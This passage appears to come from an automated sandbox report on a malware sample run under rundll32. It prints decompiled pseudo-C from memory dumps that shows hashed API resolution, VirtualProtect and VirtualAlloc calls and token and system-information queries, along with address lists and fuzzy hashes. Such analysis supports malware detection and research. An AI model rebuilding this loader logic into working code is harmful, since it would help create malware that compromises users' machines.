				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E00B92569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00b9221f
0x00b9222d
0x00b92234
0x00b92237
0x00b92241
0x00b92248
0x00b92252
0x00b92258
0x00b92261
0x00b9226a
0x00b9226d
0x00b92273
0x00b92277
0x00b9227f
0x00b92283
0x00b92286
0x00b92289
0x00b9228c
0x00b9228f
0x00b922a9
0x00b922af
0x00b922b2
0x00b922ba
0x00b922be
0x00b922c1
0x00b922c4
0x00b922c7
0x00b922ca
0x00b922e6
0x00b92303
0x00b92328
0x00b9232a
0x00b92333
0x00b92336
0x00b92340
0x00b92343
0x00b92346
0x00b92349
0x00b9234c
0x00b923a4
0x00b923a4
0x00b9254a
0x00b92550
0x00b9244d
0x00b92453
0x00b9249f
0x00b9249f
0x00b924bc
0x00b924e2
0x00b924f0
0x00b924f3
0x00b924f7
0x00b924fb
0x00b92502
0x00b92508
0x00b9250a
0x00b9251c
0x00b92524
0x00b9252a
0x00b92530
0x00b92536
0x00000000
0x00000000
0x00b9253c
0x00b9249f
0x00b9245b
0x00b92469
0x00b92471
0x00b92474
0x00b92476
0x00b9247c
0x00b92488
0x00b9248e
0x00b92491
0x00b92494
0x00b9238a
0x00b9238a
0x00b923d8
0x00b923de
0x00b923e4
0x00b923ea
0x00b923f0
0x00b923f5
0x00b923fb
0x00b923fe
0x00b92401
0x00b92409
0x00b92411
0x00b92414
0x00b92417
0x00b9241d
0x00b92423
0x00b9242e
0x00b92362
0x00b92368
0x00b92368
0x00b923c5

APIs

VirtualProtect.KERNELBASE ref: 00B9228F
VirtualProtect.KERNELBASE ref: 00B92328

Strings

t, xrefs: 00B92409

Memory Dump Source

Source File: 00000000.00000002.570073869.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 95f1fa0399fe7f669fd938c90365352ce24ffa60da88cbcf17c6a1929057ddf7
Instruction ID: f1e69abf8d7928f016ec54665fd352b7ef537c035baafe2d1a3cf6fbabdd1546
Opcode Fuzzy Hash: 95f1fa0399fe7f669fd938c90365352ce24ffa60da88cbcf17c6a1929057ddf7
Instruction Fuzzy Hash: 7C819AB4E042089FCB04DF99C580A9DFBF1FF88310F6585AAE958AB361D734A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B92439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00B92508

Memory Dump Source

Source File: 00000000.00000002.570073869.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 76d5ead6a5766aef939460b8f98e31d4762df63d0f2b329226f1976a6dc49a87
Instruction ID: abeda91d075ece8a14d07985071d2e4233f735a8423a0da06d178a746d900949
Opcode Fuzzy Hash: 76d5ead6a5766aef939460b8f98e31d4762df63d0f2b329226f1976a6dc49a87
Instruction Fuzzy Hash: 3431E8B5D006289FDB14CF68C980A9DB7F1BF88700F2582AAD94CA7306D731AE41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00B91D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00B91EA8

Memory Dump Source

Source File: 00000000.00000002.570073869.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: 977dcd3d2611522494d38b522edac0d9fb11564b1597fbd8864f1f3e417ae555
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: EE41D2B5E0521A8FDB04DFA8C4906AEBBF1FF48714F19856EE848AB340D735A840DF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6204 Parent PID: 6164 rundll32.exeCOMMON

Executed Functions

Function 733207CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E733207CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x7332d1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E73323558(0x30);
					 *0x7332d1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E733235D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E73322F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x7332d1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E73321094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x7332d1f8 + 0xb)) = _t159;
						_t355 = E73322F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x7332d1f8 + 0x28)) = 0;
							_t163 = E733207CC(0x7332d1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x7332bc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x7332bc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E7331F620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E7331F8C4(_t424 + 0x24, E7331F568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E7331F558(_t424 + 0x24, E7331F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E733254EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E7331F6F0(_t424 + 0x20);
								E7332551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E733257D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E7331E054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E7332551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E733257D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E7331E054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E7332551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E733257D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E7331E054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E7331D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E733254C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E7331D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E733254C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E7331D098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E733254C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E7331D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E733254C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E7331D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E733254C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E7331D098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E733254C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x7332d1f8 + 0x24)) = _t186;
							_t187 = E733210CC(0xffffffffffffffff);
							_t314 =  *0x7332d1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x7332d1f8 + 0x2c)) = E73321140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E73322F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x7332d1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E7332352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E73322F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E7332352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E7331F620(_t424 + 0x18c, _t202);
											_t403 = E73322F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E7331F6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E7331F558(_t424 + 0x18c, 0);
												_t209 = E7331F568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E7332352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E7331F558(_t424 + 0x18c, 0);
													E7331DFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E73322F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E7331E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E73322F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E7331E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E73324BE0( *((intOrPtr*)(_t424 + 0x1b8)), E7331E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E7331E054(_t424 + 0x1b8);
														E7331E054(_t424 + 0x1b0);
														E7331F6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E7331BC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x7332d1f8 + 0x2c)) = 6;
															L78:
															_t192 = E73322F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x7332d1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E7331BC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E7332352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E73322F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E7332352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E7331F620(_t424 + 0x3c, _t258);
									_t261 = E73322F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E7331F6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E7331F558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E7331F568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E7332352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E7331F558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E73322F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E7332352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E73321070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E73322F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E7331BC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x733207cc
0x733207cd
0x733207ce
0x733207d0
0x733207db
0x733207dd
0x733207e4
0x73321063
0x73321069
0x73321069
0x733207ee
0x733207fa
0x73320806
0x7332080b
0x73320818
0x73320822
0x73320829
0x7332082e
0x73320832
0x73320836
0x7332083b
0x7332083e
0x73320844
0x7332084a
0x73320857
0x7332085e
0x73320865
0x73320868
0x7332086b
0x7332086d
0x73320879
0x73320886
0x73320893
0x73320895
0x73320897
0x73320923
0x73320923
0x73320929
0x7332092c
0x73320931
0x73320934
0x7332094c
0x7332094d
0x7332094d
0x7332094d
0x73320951
0x7332095a
0x7332095f
0x7332095f
0x73320961
0x73320972
0x73320994
0x73320996
0x73320997
0x7332099b
0x7332099b
0x733209a4
0x733209b0
0x733209b9
0x733209cf
0x733209df
0x733209e4
0x733209e8
0x733209ed
0x733209ef
0x73320a3f
0x73320a54
0x73320a58
0x73320a5d
0x73320a6e
0x73320a83
0x73320a87
0x73320a8c
0x73320a8e
0x73320ad5
0x73320ad8
0x73320b26
0x73320b29
0x00000000
0x73320b2b
0x73320b2b
0x73320b2e
0x00000000
0x73320b30
0x73320b34
0x73320b39
0x73320b3e
0x73320b40
0x73320b44
0x73320b46
0x73320b4d
0x73320b4d
0x73320b48
0x73320b48
0x73320b4b
0x73320b51
0x73320b51
0x00000000
0x00000000
0x00000000
0x73320b4b
0x73320b53
0x73320b55
0x73320b58
0x73320b58
0x73320b55
0x73320b5d
0x73320b67
0x73320b67
0x73320b2e
0x73320ada
0x73320ada
0x73320adc
0x73320b1b
0x73320b1e
0x73320e90
0x73320e95
0x73320e9a
0x73320e9c
0x73320ea0
0x73320ea2
0x73320ea9
0x73320ea9
0x73320ea4
0x73320ea4
0x73320ea7
0x73320ead
0x73320ead
0x00000000
0x00000000
0x00000000
0x73320ea7
0x73320eaf
0x73320eb1
0x73320eb4
0x73320eb4
0x73320eb1
0x73320eb9
0x73320ec3
0x73320b24
0x00000000
0x73320b24
0x73320ade
0x73320ae2
0x73320ae7
0x73320aec
0x73320aee
0x73320af2
0x73320af4
0x73320afb
0x73320afb
0x73320af6
0x73320af6
0x73320af9
0x73320aff
0x73320aff
0x00000000
0x00000000
0x00000000
0x73320af9
0x73320b01
0x73320b03
0x73320b06
0x73320b06
0x73320b03
0x73320b0b
0x73320b15
0x73320b15
0x73320adc
0x73320a90
0x73320a90
0x73320a92
0x73320b6a
0x73320b6e
0x73320b73
0x73320b78
0x73320b7a
0x73320b7e
0x73320b80
0x73320b87
0x73320b87
0x73320b82
0x73320b82
0x73320b85
0x73320b8b
0x73320b8b
0x00000000
0x00000000
0x00000000
0x73320b85
0x73320b8d
0x73320b8f
0x73320b92
0x73320b92
0x73320b8f
0x73320b97
0x73320b97
0x73320b99
0x73320a98
0x73320a9c
0x73320aa1
0x73320aa6
0x73320aa8
0x73320aac
0x73320aae
0x73320ab5
0x73320ab5
0x73320ab0
0x73320ab0
0x73320ab3
0x73320ab9
0x73320ab9
0x00000000
0x00000000
0x00000000
0x73320ab3
0x73320abb
0x73320abd
0x73320ac0
0x73320ac0
0x73320abd
0x73320ac5
0x73320acf
0x73320acf
0x73320a92
0x733209f1
0x733209f5
0x733209fa
0x733209ff
0x73320a01
0x73320a05
0x73320a07
0x73320a0e
0x73320a0e
0x73320a09
0x73320a09
0x73320a0c
0x73320a12
0x73320a12
0x00000000
0x00000000
0x00000000
0x73320a0c
0x73320a14
0x73320a16
0x73320a19
0x73320a19
0x73320a16
0x73320a1e
0x73320a28
0x73320a28
0x73320936
0x73320938
0x73320938
0x73320ba2
0x73320ba5
0x73320baa
0x73320bac
0x73320bb5
0x73320bc1
0x73320bc4
0x73320c92
0x73320c9a
0x00000000
0x73320bca
0x73320bd4
0x73320be6
0x73320be8
0x73320bea
0x73320c76
0x73320c76
0x73320c78
0x73320c7c
0x73320c87
0x73320c7e
0x73320c7e
0x73320c7e
0x00000000
0x73320bf0
0x73320bfc
0x73320bfe
0x73320c00
0x7332104f
0x73321054
0x73321056
0x00000000
0x7332105c
0x00000000
0x7332105c
0x73320c06
0x73320c06
0x73320c17
0x73320c1b
0x73320c20
0x73320c32
0x73320c34
0x73320c36
0x73320c4d
0x73320c4f
0x73320c51
0x73320ec9
0x73320ec9
0x73320c51
0x73320c57
0x73320c5e
0x73320c60
0x73320edb
0x73320ef1
0x73320ef3
0x73320ef5
0x73321030
0x73321037
0x00000000
0x73320efb
0x73320f04
0x73320f12
0x73320f2c
0x73320f2e
0x73320f30
0x73321041
0x73321046
0x73321048
0x00000000
0x7332104a
0x00000000
0x7332104a
0x73320f36
0x73320f36
0x73320f44
0x73320f4f
0x73320f5e
0x73320f70
0x73320f72
0x73320f74
0x73320f81
0x73320f81
0x73320f91
0x73320fa2
0x73320fa7
0x73320fa9
0x73320fbf
0x73320fe0
0x73320fe9
0x73320ff5
0x73321001
0x73321006
0x7332100b
0x73321011
0x73321011
0x73321016
0x7332101c
0x00000000
0x73321022
0x73321024
0x73320c9d
0x73320ca9
0x73320cb0
0x73320cb2
0x73320cbc
0x73320cbc
0x73320cbe
0x73320cc0
0x73320ccf
0x73320cdb
0x73320cdf
0x73320ce2
0x73320ce5
0x73320ce8
0x00000000
0x73320ce8
0x73320fab
0x73320fab
0x73320fb2
0x73320fb3
0x73320fb3
0x73320fa9
0x73320f30
0x73320c66
0x73320c66
0x73320c66
0x73320c6b
0x73320c71
0x73320c71
0x00000000
0x73320c6b
0x73320c60
0x73320c00
0x73320bea
0x7332089d
0x733208a9
0x733208ab
0x733208ad
0x73320e7a
0x73320e7f
0x73320e81
0x00000000
0x73320e87
0x00000000
0x73320e87
0x733208b3
0x733208b3
0x733208c4
0x733208c8
0x733208cd
0x733208da
0x733208e1
0x733208e3
0x733208fa
0x733208fc
0x733208fe
0x73320cf6
0x73320cf6
0x733208fe
0x73320904
0x7332090b
0x7332090d
0x73320d05
0x73320d16
0x73320d1b
0x73320d1d
0x73320d1f
0x73320e50
0x73320e54
0x00000000
0x73320d25
0x73320d2b
0x73320d50
0x73320d52
0x73320d54
0x73320e6c
0x73320e71
0x73320e73
0x00000000
0x73320e75
0x00000000
0x73320e75
0x73320d5a
0x73320d5a
0x73320d65
0x73320d6c
0x73320d73
0x73320d7a
0x73320d7b
0x73320d7c
0x73320d8e
0x73320d90
0x73320d92
0x00000000
0x73320d98
0x73320d9a
0x73320db5
0x73320db7
0x73320db9
0x73320e5e
0x73320e63
0x73320e65
0x00000000
0x73320e67
0x00000000
0x73320e67
0x73320dbf
0x73320dbf
0x73320dbf
0x73320dc6
0x73320dca
0x73320e35
0x73320e35
0x73320e37
0x73320e3e
0x73320e3e
0x73320e39
0x73320e39
0x73320e3c
0x73320e42
0x73320e42
0x00000000
0x00000000
0x00000000
0x73320e3c
0x73320e44
0x73320e46
0x73320e4b
0x73320e4b
0x00000000
0x73320dcc
0x73320dcc
0x73320dcc
0x73320dce
0x73320dda
0x73320ddf
0x73320de1
0x00000000
0x00000000
0x73320e2f
0x73320e30
0x73320e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73320e33
0x73320de3
0x73320de7
0x73320dee
0x73320def
0x73320def
0x73320dca
0x73320db9
0x73320d92
0x73320d54
0x73320913
0x73320913
0x73320913
0x73320918
0x7332091e
0x7332091e
0x00000000
0x73320918
0x7332090d
0x733208ad
0x7332082b
0x7332082b
0x7332082c
0x7332082d
0x7332082d
0x73320ceb
0x73320ceb
0x73320cf5
0x73320cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 733208FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 73320CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 73320D50

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
